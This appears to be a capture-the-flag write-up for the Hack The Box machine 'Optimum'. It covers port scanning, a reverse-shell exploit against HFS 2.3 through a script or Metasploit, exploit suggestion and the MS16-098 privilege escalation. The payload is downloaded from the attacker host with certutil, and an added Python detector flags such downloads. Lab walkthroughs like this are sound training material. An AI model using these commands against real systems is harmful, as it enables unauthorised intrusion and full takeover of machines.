MACHINE IP — 10.10.10.8

Nmap scan
nmap -p- -sCV -A -v 10.10.10.8
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|Vista|2008 (91%)
Here we can see that only the HTTP port is open.
Moving ahead to HTTP, we can see that HTTP server 2.3 is running on it.
After this I enumerated the whole page but didn't find any useful hint to move ahead. After searching for vulnerabilities in the server version, I got 39161.py from GitHub. This Python exploit gives a reverse shell; we just have to change the things below in the 39161.py script.
ip_addr = YOUR IP
local_port = YOUR PORT
NOTE :- change this in the Python script (39161.py) for getting a shell
After that we run nc on the selected port and get a reverse shell as the kostas user.
{ NOTE : you might not get the reverse shell so quickly; you have to run the script several times to get a reverse shell. Otherwise use msfconsole for getting a reverse shell: use "exploit/windows/http/rejetto_hfs_exec", set payload windows/meterpreter/reverse_tcp, enter your rhost, rport, lhost, lport, then run it. } After getting the meterpreter shell, run the shell command to get a Windows shell.
After getting the shell, you will see that you are the kostas user by using the whoami command. Move to C:\Users\kostas\Desktop and you will find user.txt.txt; run type user.txt.txt to see the user hash.
POST EXPLOITATION {Administrator power }
Run systeminfo

Copy this systeminfo output and paste it into a file on your local PC named systeminfo, then run the command below to check for vulnerabilities to exploit.
./windows-exploit-suggester.py -d 2019-09-18-mssb.xls -i /root/predator/oscp/htb/optimum/systeminfo
1. ./windows-exploit-suggester.py --update
This will give you the latest file of exploits.
2. ./windows-exploit-suggester.py --database 2019-09-18-mssb.xls --systeminfo systeminfo
2019-09-08-mssb.xls - file you get after the update command
systeminfo - file into which you copied the Windows output of the systeminfo command
This Python script is used for finding vulnerabilities in a Windows machine so that we can exploit them for privilege escalation.
Here you will get various vulnerabilities for exploiting the machine, but only some of them indicate privilege escalation.
On looking for exploits I found MS16-098 to be useful. After searching for a while I found a GitHub repository with an .exe file, which is useful because we don't have to compile it.
There I got the bfill.exe file. Now the main task is to transfer this file to our target Windows machine.
I used the command below for transferring the file to the Windows machine.
python -m SimpleHTTPServer 80
on my local PC having bfill.exe

Then used
certutil -urlcache -f http://10.10.14.7:80/bfill.exe raj.exe
on the Windows machine

So here we got our exploit onto the machine
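
From the defender's side, the certutil download above is visible in process-creation logs (for example Windows Security event 4688 or Sysmon event 1, with command-line logging enabled). The check below is an added example, not part of the original write-up; the names inspect_certutil and scan are hypothetical, and the sample command lines are constructed, apart from the first, which is the command used above.

```python
import re
import shlex

# Match the urlcache verb with either switch prefix, in any letter case.
URLCACHE = re.compile(r"^[-/]urlcache$", re.IGNORECASE)
REMOTE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".msi", ".ps1", ".bat", ".vbs", ".hta")

def inspect_certutil(cmdline):
    """Return a finding dict when cmdline is certutil fetching a URL, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                            # unbalanced quote in the log
        argv = cmdline.split()
    argv = [a.strip('"') for a in argv]
    if not argv:
        return None
    image = re.split(r"[\\/]", argv[0])[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    args = argv[1:]
    if not any(URLCACHE.match(a) for a in args):
        return None
    urls = [a for a in args if REMOTE.match(a)]
    if not urls:
        return None  # no remote URL on the line, e.g. listing the cache
    # The first non-switch argument after the URL is the local output file.
    rest = args[args.index(urls[0]) + 1:]
    outfile = next((a for a in rest if not a.startswith(("-", "/"))), None)
    names = [urls[0].split("?")[0].lower(), (outfile or "").lower()]
    return {"url": urls[0], "outfile": outfile,
            "executable": any(n.endswith(EXEC_EXT) for n in names)}

# Constructed sample command lines; the first is the command from this write-up.
SAMPLES = [
    r"certutil -urlcache -f http://10.10.14.7:80/bfill.exe raj.exe",
    r'"C:\Windows\System32\CertUtil.exe" /URLCache /split /f https://files.example.test/a.txt out.txt',
    r"certutil -hashfile raj.exe SHA256",
    r"certutil -urlcache *",
]

def scan(lines):
    """Return (line, finding) pairs for every line that triggers the check."""
    return [(l, f) for l in lines if (f := inspect_certutil(l))]

if __name__ == "__main__":
    for line, finding in scan(SAMPLES):
        print(finding, "<-", line)
```
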
Now we just have to run the exploit


Here we get SYSTEM access; now we have all the permissions to move around in the machine

And here we got the root.txt

THANK YOU !!!!!